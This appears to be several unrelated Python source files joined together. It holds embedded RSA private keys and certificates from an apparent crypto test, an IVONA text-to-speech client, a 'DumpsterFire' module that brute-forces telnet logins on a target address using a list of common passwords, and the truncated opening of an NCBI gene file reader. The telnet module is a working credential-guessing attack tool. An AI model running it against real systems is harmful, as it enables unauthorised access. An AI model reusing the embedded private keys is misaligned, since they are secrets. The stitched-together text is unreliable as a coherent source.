QoJ727Ka7CwIRupGLa73zCh+uDQUrsWLLsTKlQ2QB9pY07rzGVLCWUMc4i062TFQ
Lpu9TB7SvIpZECIYOqUd19DxEPaZ6idHBkysrUbZOIZcgGTPQaXBed/Fx7bQsGyQ
65bg/b8Fg/UQSBbsAqb2Yu76Hl9LacD9dAMOmL3hbOsm6/lG0jkZlhOXkZnM4WM8
WHeFfg+Nd/DyYyqyyPPLF80pjq179d7vJBu9u/cZ1u52d+zYn5HEooX66/O+b5NY
iKHYkhh01bD1txynI0PJnwi8a4zKA63mLCDQACUE6hsH4LqzKHbpKFzBV+TaXQA4
7FECggEAZwEYlW3eqEqFr0fFyulzSExtk91srWns/OKyHpAuBZrWVdepJoIsV7gT
4WXfsedQheRFCoN+VBijXKvC5nGbOV7I7omvuVwu9gok2/XrPTMJd2ImcrhpzjZA
k2b9HvPZOswQApK8hCM8i1oAmVHEhsd9PJjFZAobf9UkmHIgYH34gK9LVZF0vYBV
auhdzE8GRK4lN+xIQJ7LHc1pe6GQqmBHazdNbwxba1zAFDUyhT2BUsSIal3oWCAn
nXDjrWs3TWnyGtp2jqV3DJL0u926p058CfS8YGIEUhcmCrq7vY4BdlotRiZ1ne4f
xEiTdltEAFDNYHd2DbgRdqB75BZ0wQKCAQEA0G7GH4w89CQDQWqe540MWaaodFZD
9SQNHEHx0sQmmumc+sd5OWOt6HNZXZxzIplU22c0WIPg52t4oAG4ALE87dkTqtiI
c8hibKRlDZdEOkvPRnoh1re43PvZQ4lGfDE55hAGSe+H0UfYyRDp/ptVJwiLgF6Q
DejgTHgS30qIdFrsWdoiepl/suH27bfxViA3Datu8aqAh0i9IMnlYIl/5JUX7CtT
9jnj3zOmjt4UqmEikqzA/d/h4QBAY2wEOzO3LHMsQmXkd1QFDgH5dpzaDdgpKfjE
p5G2VV8lmOBt+Vx5PqBiPxfsTbsEFi35C3bc2F6ZBBGYqtWbclYrCvjbMg==
-----END RSA PRIVATE KEY-----
""")
realUserCert = load_certificate(FILETYPE_PEM, """
-----BEGIN CERTIFICATE-----
MIIE8TCCAtkCADANBgkqhkiG9w0BAQ0FADA9MRowGAYDVQQDExFDcnlwdG8gMTAx
IENsaWVudDEfMB0GCSqGSIb3DQEJARYQdXNlckBleGFtcGxlLmNvbTAiGA8yMDEz
MTIxODAwMDAwMFoYDzIwMTgxMjE4MDAwMDAwWjA9MRowGAYDVQQDExFDcnlwdG8g
MTAxIENsaWVudDEfMB0GCSqGSIb3DQEJARYQdXNlckBleGFtcGxlLmNvbTCCAiIw
DQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKZ74kqEdCTxY0mmLN6QeMnANvgj
XL5z6RRTGbHAE8OSfh+Unfj9sWKOVz+zfCo7OkcRcLudH3j6juQV6TJbptChj94U
+4EPbpNlpGlxReRRB8AZDUmvCUx16B6eZ9kFpIf4eRuZUpI35OSM3cyWLCOy1QhZ
0vBRC+K+RDk5t9hAzSEIL9RYZk96wMO7MAFHPfOKGaxm2hgwCabfFnwhWRtJlFNY
WugEm+XbUGdqcbyeWSUXKFe73dp03kjIVCggz60KnZ8B+ue7Ok811hPFZCNKzey2
BbWgkWyPVaEVmcKLK0SYCw70TINyN22l/5UXJGMA5rDa9NtNE30gE/JKhCoXTh9M
5NzqQOyrgIwnVkGTGNQvFdoz2MLnjyH0R2DlCMVkwWpGuijTVmva9pkiwNCHGenX
X3jX+Y9q06wPYfnb5hRLSlDpKcZilFnjSyQXFM/kwYjn8zIDEVBzOgtEkAFaj1VW
WaeXVrfBl+ldsMkK4efOE22BxN5AipqWYWPk2nqEFe6Yt6ENipl9AKPeHnDKhbqi
+FhQAW9Hdb8fJMXz8idBYFPYUjK8ERPhMRq2evVRdETZJ8QWWQ0RMw/RiVZU2Vyz
sd+4vuy27SpmV3mV8Liyib65LVww2kD1Feug1mpqp41EOjZWK3RWOKJkTSEjnE/M
rY0acqHMabfGLZXxAgMBAAEwDQYJKoZIhvcNAQENBQADggIBABnlQWPzqLEqLsFb
5ykb3S3H7x8NJO8ln9xoejkKQj8YxoJbIaAThjCv3gzQbobVkDMTbpStn3AlC8fG
gQHSTfaOl+A41LFo9Y7spKjGRdFGYz7uQY6d5xgHFB+aQ0am5vuAThEp/FxTuCTA
X8JpuTPB8yLJrT7vh3446zx5fPEXhfeRw7h8QdeczgCj2CRzblqcPSplK5FbgOjE
GuefAEmeb2GU60SeLtmtXDcR28ujJrQlQgHk3xSP9Mg/YAVZ+4YnpfuiQmOWXsSA
gRTPiOR+5l47QzDnpJLPlTa+oow/mXPT58Zkimgh60hqfpTShLM0oylubedkKGKn
UvZ5Zv/CACI2epLxDlgZXZcySp+bJradxVdUZPPW/Tmnc2NIZD/gCXLH7YNEDUyv
ZnOh50N7xUg7qrhnr+IloXog+Y5wRQkj76ejuMlPPEOMz2xlnzMIpLEl6b+HkFwT
BWeWlfyzpTWteKMlq/Rw3ghQ2kFhayrckqnaWKNmErK55vZJok4UP+U/ilC4L/ZM
XLZgb39Awni8L9p59ZrK3mn1VbD/l6axff3fj2Db7lb7pcT1ssT2gazgQvPxHEYt
U2fKTgUyO2tWNHed2PCKSJ6F6rpG4RRcN53BTnOo27b38NrZnx06bh9OUW3Ws5Qf
43YN/h7UXI5gAnnHR4fgkR0H8prK
-----END CERTIFICATE-----
""")
impostorKey = load_privatekey(FILETYPE_PEM, """
-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----
""")
impostorCert = load_certificate(FILETYPE_PEM, """
-----BEGIN CERTIFICATE-----
MIIE8TCCAtkCADANBgkqhkiG9w0BAQ0FADA9MRowGAYDVQQDExFDcnlwdG8gMTAx
IENsaWVudDEfMB0GCSqGSIb3DQEJARYQdXNlckBleGFtcGxlLmNvbTAiGA8yMDEz
MTIxODAwMDAwMFoYDzIwMTgxMjE4MDAwMDAwWjA9MRowGAYDVQQDExFDcnlwdG8g
MTAxIENsaWVudDEfMB0GCSqGSIb3DQEJARYQdXNlckBleGFtcGxlLmNvbTCCAiIw
DQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAL5nHJKxsgDBpQMKaerj0M9k8lDJ
WAYjWTck5XYlsN2gvNXOK2fl/iX7AKdSMG9qHZYsxFAakZzf8naqkyhXCZhdCQzL
TKF+evj80v8mMB7E1lMiGE8U4D6q/3GEkbSs1T/hIWzhcKnoOZ3HaZn4dfm4sWzW
dfcKyovOa9PpWhr1JoVZG3OOdzoMGLfyTnR/pX5AnpcmEKusW4/xzIYc8SsWT9wq
hQZywEt69llGVByv78b219hnZbwbpAZ4SAqfgZcyJAZTclpTuamiv0SCvPzbwnEF
JhCVFCZyXz6EfZNi7bo5DuPPGmS30Or4BF2/MD5wr+lMVDP1IsXnrmpCa5cWFRIU
PaJv05O+aIvuMsipfwd75iqmULltBzReFISV/OoXlt+kM1i7Li5oN4JC08SZpD1o
BjG0mWo9w1Rxe/C0KTA3oAGwq0/lAesqraHYZ9jT6ylE1PI/GBEnFu0RYjAzJ20H
COee4eRpSQvd/GLa6qY3K1XT6YYW9KwpnW953/W/FHyVbi0u3HNrbdzjrfCFONnG
yu6TwLe/rh0xtEXCa4zJEsLXkA9mvlTzlA2V6IGKKPqDYiWaVVKawW/+s8KkrQcT
gKqs/L0TqvUhXkp0mSU0GO1+gaoHhs09uyLNVOFDhU6VKd9B4ifSl1V+n6fEjY/N
qgS7fKm7bBFFFUSxAgMBAAEwDQYJKoZIhvcNAQENBQADggIBALU0ItdvHxNBJ/0f
dFVcrBxPzXrZMmXzLf8KqLVn46iDefb+NzW1yZd2ZaaPuLOSySXLXdokY0cmeUYv
04Ainl0EG4EVfV930vcg2Q0He1EJyiDTqEEozdP9e+vkjuLbrnrjCMn69FVmELhu
W1jQRaR5amcpOWXs4qhehthZWkDEBUIs5cwDNZXRFWzJq2IsT5bjy/XJYa4wiXD1
z/BWzRovOsdhZgX+YY3AhNGzyXxoKWjYh8+38Rt9bQJ9SH1ypbzx2BgYTT9hd0e1
uTi3Ss6ewQCuZqkoxcrkV0478Dxj7zUphHUl7AcbFz6vj2n1s9G0HjQDHRzYDMCj
KZ/SAbvT4G4S3pu9LPOtzmMFsTcPcZ8+njD0PrwvEXduMMSeOxpmO2a+/ARhqld1
6dS+R9YMtAvj3nInShEf8LtWTNMdzzQZrr4VVqtid2zxUeiY83L/xJCtXvbaxz5u
RpJXTDYxDZWSXNdppOydRonIAPqDOCMBrVUPPU3jNs0HtPROej1Xjh5EPI5affSc
pOUOQ1i/Og7gQtcyNtvwmgBn8yhTVZnwgS0GGTITIjJYMCnco8GgXGjhnBNp0zWv
y+UVyEjsKa5MbEyDxvIN36xACb3qG6za2S87L8DE0fwGvExD9FM7P6l5ZBAV+xd9
UvElfcF0Vk5PLLFNUTBMpoDv5GSZ
-----END CERTIFICATE-----
""")
bogusCert = load_certificate(FILETYPE_PEM, """
-----BEGIN CERTIFICATE-----
MIIE8zCCAtsCADANBgkqhkiG9w0BAQ0FADA+MRowGAYDVQQDExFDcnlwdG8gMTAx
IENsaWVudDEgMB4GCSqGSIb3DQEJARYRQk9HVVNAZXhhbXBsZS5jb20wIhgPMjAx
MzEyMTgwMDAwMDBaGA8yMDE4MTIxODAwMDAwMFowPjEaMBgGA1UEAxMRQ3J5cHRv
IDEwMSBDbGllbnQxIDAeBgkqhkiG9w0BCQEWEUJPR1VTQGV4YW1wbGUuY29tMIIC
IjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvmcckrGyAMGlAwpp6uPQz2Ty
UMlYBiNZNyTldiWw3aC81c4rZ+X+JfsAp1Iwb2odlizEUBqRnN/ydqqTKFcJmF0J
DMtMoX56+PzS/yYwHsTWUyIYTxTgPqr/cYSRtKzVP+EhbOFwqeg5ncdpmfh1+bix
bNZ19wrKi85r0+laGvUmhVkbc453OgwYt/JOdH+lfkCelyYQq6xbj/HMhhzxKxZP
3CqFBnLAS3r2WUZUHK/vxvbX2GdlvBukBnhICp+BlzIkBlNyWlO5qaK/RIK8/NvC
cQUmEJUUJnJfPoR9k2LtujkO488aZLfQ6vgEXb8wPnCv6UxUM/UixeeuakJrlxYV
EhQ9om/Tk75oi+4yyKl/B3vmKqZQuW0HNF4UhJX86heW36QzWLsuLmg3gkLTxJmk
PWgGMbSZaj3DVHF78LQpMDegAbCrT+UB6yqtodhn2NPrKUTU8j8YEScW7RFiMDMn
bQcI557h5GlJC938YtrqpjcrVdPphhb0rCmdb3nf9b8UfJVuLS7cc2tt3OOt8IU4
2cbK7pPAt7+uHTG0RcJrjMkSwteQD2a+VPOUDZXogYoo+oNiJZpVUprBb/6zwqSt
BxOAqqz8vROq9SFeSnSZJTQY7X6BqgeGzT27Is1U4UOFTpUp30HiJ9KXVX6fp8SN
j82qBLt8qbtsEUUVRLECAwEAATANBgkqhkiG9w0BAQ0FAAOCAgEAm/qYWE6sc5Ms
ZfZVXLAO/y5n7M5Fn30krZ6QEPZGrTjmPTgokyPvl+w1syQKjlSl/4ezfO8nocZK
RmgTIXv740FxtzCuXNjYvdREUH9Sf3UiDjazRoeXdUAacaKGxglfnlw2F4XlVq3G
JCUpLafPrJJWBAt47RvaK2sT0VmsgrKWCnTrAvkx9lD3sr7lazo1y6VCoYu7JQUI
g5sO+db0B7CkG4+uRgEmRSsSX9VQhRSQgXY6gE+ac1mKtjIaygyM4ndEAVoaHtI0
3+ANFh7atilQNAuJvkQS1ZypgY6SQ2Ap10zZFO4M5EUq3iSpX/8IT1D7HsbLskm1
XySFXlQ3EUiVRbgZ6Q07FUNI0+BRrk6lH3r771Xwb1dqW0k1VyI2KM95Hd7Z38Bz
v8S8XtBKMzvTNqAP6qFpUXuxjIVUPu3AxEChnOtpJ1ney7QJCpyWzuQMvgC3/Hvw
W3x1/bG+IJRg7tlBBsTYG8fefENzBpJVslTgLVHaHgnO3XrGI0EJR3B4hZ5HDzyH
XG82KXZ7uSM3RKDKsKN+UQdtUhBVrKskA3M/25ZIN8Ah+A5BO7jdh3hIA8fMPBaX
xMSAjNLyo3RjjpJMgeEs2+zqBqW4NKRB2ojeWZUA0dXgCO1nFlorAVSXNAHICKrk
zSrTx+wpRsqC46MW1cq5bvEJ7yqas/Q=
-----END CERTIFICATE-----
""")
|
|
#!/usr/bin/env python
# encoding: utf-8
"""Pyvona : an IVONA python library
Author: Zachary Bears
Contact Email: [email protected]
"""
import datetime
import hashlib
import hmac
import json
import tempfile
import contextlib
import os
import logging
from ..audio import sounds
logger = logging.getLogger(__name__)
class PyvonaException(Exception):
pass
try:
import requests
requests.packages.urllib3.disable_warnings()
except ImportError:
msg = 'The requests library is essential for Pyvona operation. '
msg += 'Without it, Pyvona will not function correctly.'
raise PyvonaException(msg)
_amazon_date_format = '%Y%m%dT%H%M%SZ'
_date_format = '%Y%m%d'
def create_voice():
"""Creates and returns a voice object to interact with
"""
return Voice()
class Voice(object):
"""An object that contains all the required methods for interacting
with the IVONA text-to-speech system
"""
voice_name = 'Agata'
language = 'pl-PL'
gender = None
speech_rate = None
sentence_break = None
paragraph_break = None
_codec = "ogg"
region_options = {
'us-east': 'us-east-1',
'us-west': 'us-west-2',
'eu-west': 'eu-west-1',
}
access_key = None
secret_key = None
algorithm = 'AWS4-HMAC-SHA256'
signed_headers = 'content-type;host;x-amz-content-sha256;x-amz-date'
_region = None
_host = None
_session = None
@property
def region(self):
return self._region
@region.setter
def region(self, region_name):
self._region = self.region_options.get(region_name, 'eu-west-1')
self._host = 'tts.{}.ivonacloud.com'.format(self._region)
@property
def codec(self):
return self._codec
@codec.setter
def codec(self, codec):
if codec not in ["mp3", "ogg"]:
raise PyvonaException(
"Invalid codec specified. Please choose 'mp3' or 'ogg'")
self._codec = codec
@contextlib.contextmanager
def use_ogg_codec(self):
current_codec = self.codec
self.codec = "ogg"
try:
yield
finally:
self.codec = current_codec
def fetch_voice_ogg(self, text_to_speak, filename):
"""Fetch an ogg file for given text and save it to the given file name
"""
with self.use_ogg_codec():
self.fetch_voice(text_to_speak, filename)
def fetch_voice(self, text_to_speak, filename):
"""Fetch a voice file for given text and save it to the given file name
"""
file_extension = ".{codec}".format(codec=self.codec)
filename += file_extension if not filename.endswith(
file_extension) else ""
with open(filename, 'wb') as f:
self.fetch_voice_fp(text_to_speak, f)
def fetch_voice_fp(self, text_to_speak, fp):
"""Fetch a voice file for given text and save it to the given file pointer
"""
r = self._send_amazon_auth_packet_v4(
'POST', 'tts', 'application/json', '/CreateSpeech', '',
self._generate_payload(text_to_speak), self._region, self._host)
if r.content.startswith(b'{'):
raise PyvonaException('Error fetching voice: {}'.format(r.content))
else:
fp.write(r.content)
def speak(self, text_to_speak, use_cache=True, async=False):
"""Speak a given text
"""
try:
text = u'' + text_to_speak
text_to_speak = text.encode('utf-8')
except Exception as e:
logger.error('Pyvona speak exception ' + str(e))
if use_cache is False:
with tempfile.NamedTemporaryFile(delete=False) as f:
with self.use_ogg_codec():
self.fetch_voice_fp(text_to_speak, f)
f.seek(0)
else:
cache_f = hashlib.md5(text_to_speak).hexdigest() + '.ogg'
if not os.path.isdir(self.speech_cache_dir):
os.makedirs(self.speech_cache_dir)
# remove the empty file
if os.path.isfile(self.speech_cache_dir + cache_f):
if not os.path.getsize(self.speech_cache_dir + cache_f) > 0:
os.remove(self.speech_cache_dir + cache_f)
if not os.path.isfile(self.speech_cache_dir + cache_f):
with self.use_ogg_codec():
self.fetch_voice(
text_to_speak, self.speech_cache_dir + cache_f)
f = self.speech_cache_dir + cache_f
sounds.play_file(f, async)
def list_voices(self):
"""Returns all the possible voices
"""
r = self._send_amazon_auth_packet_v4(
'POST', 'tts', 'application/json', '/ListVoices', '', '',
self._region, self._host)
return r.json()
def _generate_payload(self, text_to_speak):
return json.dumps({
'Input': {
"Type": "application/ssml+xml",
'Data': text_to_speak
},
'OutputFormat': {
'Codec': self.codec.upper()
},
'Parameters': {
'Rate': self.speech_rate,
'SentenceBreak': self.sentence_break,
'ParagraphBreak': self.paragraph_break
},
'Voice': {
'Name': self.voice_name,
'Language': self.language,
'Gender': self.gender
}
})
def _send_amazon_auth_packet_v4(self, method, service, content_type,
canonical_uri, canonical_querystring,
request_parameters, region, host):
"""Send a packet to a given amazon server using Amazon's signature Version 4,
Returns the resulting response object
"""
# Create date for headers and the credential string
t = datetime.datetime.utcnow()
amazon_date = t.strftime(_amazon_date_format)
date_stamp = t.strftime(_date_format)
# Step 1: Create canonical request
payload_hash = self._sha_hash(request_parameters)
canonical_headers = 'content-type:{}\n'.format(content_type)
canonical_headers += 'host:{}\n'.format(host)
canonical_headers += 'x-amz-content-sha256:{}\n'.format(payload_hash)
canonical_headers += 'x-amz-date:{}\n'.format(amazon_date)
canonical_request = '\n'.join([
method, canonical_uri, canonical_querystring, canonical_headers,
self.signed_headers, payload_hash])
# Step 2: Create the string to sign
credential_scope = '{}/{}/{}/aws4_request'.format(
date_stamp, region, service)
string_to_sign = '\n'.join([
self.algorithm, amazon_date, credential_scope,
self._sha_hash(canonical_request)])
# Step 3: Calculate the signature
signing_key = self._get_signature_key(
self.secret_key, date_stamp, region, service)
signature = hmac.new(
signing_key, string_to_sign.encode('utf-8'),
hashlib.sha256).hexdigest()
# Step 4: Create the signed packet
endpoint = 'https://{}{}'.format(host, canonical_uri)
authorization_header = '{} Credential={}/{}, ' +\
'SignedHeaders={}, Signature={}'
authorization_header = authorization_header.format(
self.algorithm, self.access_key, credential_scope,
self.signed_headers, signature)
headers = {
'Host': host,
'Content-type': content_type,
'X-Amz-Date': amazon_date,
'Authorization': authorization_header,
'x-amz-content-sha256': payload_hash,
'Content-Length': str(len(request_parameters))
}
# Send the packet and return the response
# Use requests.Session() for HTTP keep-alive
if self._session is None:
self._session = requests.Session()
return self._session.post(
endpoint, data=request_parameters, headers=headers)
def _sha_hash(self, to_hash):
return hashlib.sha256(to_hash.encode('utf-8')).hexdigest()
def _sign(self, key, msg):
return hmac.new(key, msg.encode('utf-8'), hashlib.sha256).digest()
def _get_signature_key(self, key, date_stamp, region_name, service_name):
k_date = self._sign(('AWS4{}'.format(key)).encode('utf-8'), date_stamp)
k_region = self._sign(k_date, region_name)
k_service = self._sign(k_region, service_name)
k_signing = self._sign(k_service, 'aws4_request')
return k_signing
def __init__(self):
"""Set initial voice object parameters
"""
from mopidy_ais_ext.config.settings import Config
config = Config.get_config()
logger.debug(str(config))
self.access_key = config['ivona_access_key']
self.secret_key = config['ivona_secret_key']
self.language = config['language']
self.voice_name = config['voice_name']
self.region = 'eu-west'
logger.debug('----------------------------------------')
logger.debug('the language is: ' + self.language + ' ----')
logger.debug('the voice is: ' + self.voice_name + ' ----')
logger.debug('----------------------------------------')
self.speech_rate = 'medium'
self.sentence_break = 400
self.paragraph_break = 650
# speech_cache_dir = os.getcwd() + '/speech_cache/'
self.speech_cache_dir = os.path.dirname(__file__) + \
os.sep + 'speech_cache' + os.sep + \
self.language + '/' + self.voice_name + '/'
# [Nicole, Enrique, Agnieszka, Tatyana, Russell,
# Lotte, Geraint, Carmen, Mads, Penelope, Jennifer,
# Brian, Eric, Ruben, Ricardo, Maxim, Giorgio, Carla,
# Naja, Maja, Astrid, Ivy, Kimberly, Chantal, Amy, Marlene,
# Ewa, Conchita, Karl, Miguel, Mathieu, Justin, Chipmunk,
# Jacek, Ines, Gwyneth, Cristiano, Celine, Jan, Liv,
# Joey, Raveena, Filiz, Dora, Salli, Vitoria, Emma, Hans, Kendra]
|
|
#!/usr/bin/python
#
# Filename: telnet_top_100_defaults.py
#
# Version: 1.0.0
#
# Author: Joe Gervais (TryCatchHCF)
#
# Summary:
#
# Part of the DumpsterFire Toolset. See documentation at https://github.com/TryCatchHCF/DumpsterFire
#
# Description:
#
#
import os, sys, telnetlib, datetime
from FireModules.fire_module_base_class import *
class telnet_top_100_defaults( FireModule ):
def __init__(self):
self.commentsStr = "AccountBruting/telnet_top_100_defaults"
def __init__(self, moofStr):
self.moofStr = moofStr
self.commentsStr = "AccountBruting/telnet_top_100_defaults"
return;
def Description( self ):
self.Description = "Launches telnet bruteforce against target system, using common users/passwords"
return self.Description
def Configure( self ):
self.networkAddrStr = raw_input( "Enter target address (W.X.Y.Z) or domain: " )
return
def GetParameters( self ):
return( self.networkAddrStr )
def SetParameters( self, parametersStr ):
self.networkAddrStr = parametersStr
return
def ActivateLogging( self, logFlag ):
print self.commentsStr + ": Setting Logging flag!"
print logFlag
return
def Ignite( self ):
if ( self.networkAddrStr == "" ):
print "## ", self.commentsStr, ": Error - Network address string is blank"
return
else:
self.mCurrentDateTimeUTC = datetime.datetime.utcnow()
print "UTC", self.mCurrentDateTimeUTC.strftime("%x %X"), "- Attempting telnet connection to:", self.networkAddrStr
try:
# Set timeout to 3 seconds so we don't stall out
telnetSession = telnetlib.Telnet( self.networkAddrStr, 23, 3 )
print "Telnet session established to host:", self.networkAddrStr
i = 0
m = 0
# If we got a telnet session, time to bruteforce some creds
while i < len( telnetUsernames ):
while m < len( telnetPasswords ):
telnetSession.read_until( "login: " )
telnetSession.write( telnetUsernames[ i ] + "\n" )
telnetSession.read_until( "Password: " )
telnetSession.write( telnetPasswords[ m ] + "\n" )
m = m + 1
i = i + 1
except:
print "Could not establish telnet connection"
return
# Declare these lists down here so they don't clutter up the methods
telnetUsernames = [ "admin", "root", "test", "telnet" ]
telnetPasswords = [ "admin", \
"administrator", \
"root", \
"test", \
"telnet", \
"toor", \
"password", \
"password1", \
"Passw@rd", \
"000000", \
"111111", \
"123123", \
"1234", \
"12345", \
"123456", \
"1234567", \
"12345678", \
"123456789", \
"1234567890", \
"654321", \
"666666", \
"987654321", \
"abc123", \
"amanda", \
"andrea", \
"andrew", \
"angel", \
"angels", \
"anthony", \
"ashley", \
"babygirl", \
"barbie", \
"baseball", \
"basketball", \
"brandon", \
"bubbles", \
"butterfly", \
"carlos", \
"charlie", \
"chelsea", \
"chocolate", \
"computer", \
"cookie", \
"daniel", \
"danielle", \
"dev", \
"dragon", \
"elizabeth", \
"eminem", \
"family", \
"flower", \
"footbal", \
"football", \
"forever", \
"friends", \
"fuckyou", \
"hannah", \
"hello", \
"hottie", \
"iloveu", \
"iloveyou", \
"jasmine", \
"jennifer", \
"jessica", \
"jesus", \
"jonathan", \
"jordan", \
"joseph", \
"joshua", \
"junior", \
"justin", \
"letmein", \
"liverpool", \
"logon", \
"lovely", \
"loveme", \
"lovers", \
"loveyou", \
"maintaince", \
"marketing", \
"master", \
"matthew", \
"melissa", \
"michael", \
"michelle", \
"monkey", \
"mustang", \
"naruto", \
"nicole", \
"ninja", \
"playboy", \
"pretty", \
"princess", \
"purple", \
"querty", \
"qwerty", \
"raspberry", \
"robert", \
"samantha", \
"secret", \
"shadow", \
"soccer", \
"spongebob", \
"summer", \
"sunshine", \
"superman", \
"sweety", \
"teamo", \
"techsupport", \
"tigger", \
"tinkerbell", \
"trustno1", \
"tweety", \
"uploader", \
"vanessa", \
"webadmin", \
"webmaster", \
"welcome", \
"whatever" ]
|
|
"""Reads an NCBI Gene tsv file."""
from __future__ import print_function
import sys
import re
from collections import namedtuple
from collections import OrderedDict
__copyright__ = "Copyright (C) 2016-present, DV Klopfenstein, H Tang, All rights reserved."
__author__ = "DV Klopfenstein"
#pylint: disable=line-too-long,too-many-instance-attributes,unnecessary-lambda
class NCBIgeneFileReader:
"""Reads an NCBI Gene tsv file.
Generate the NCBI gene file by following these steps:
1) Open a browser at: https://www.ncbi.nlm.nih.gov/gene
2) Type search text. Example:
genetype protein coding[Properties] AND "3702"[Taxonomy ID] AND alive[property]
3) Press the "Search" button.
4) From the pull down menu: "Send to" -> File
"""
# ints=None, floats=None, hdr_ex=None, log=sys.stdout):
#def __init__(self, sep, ints, floats, hdr_ex, log):
def __init__(self, fin, sep="\t", **kwargs_dict):
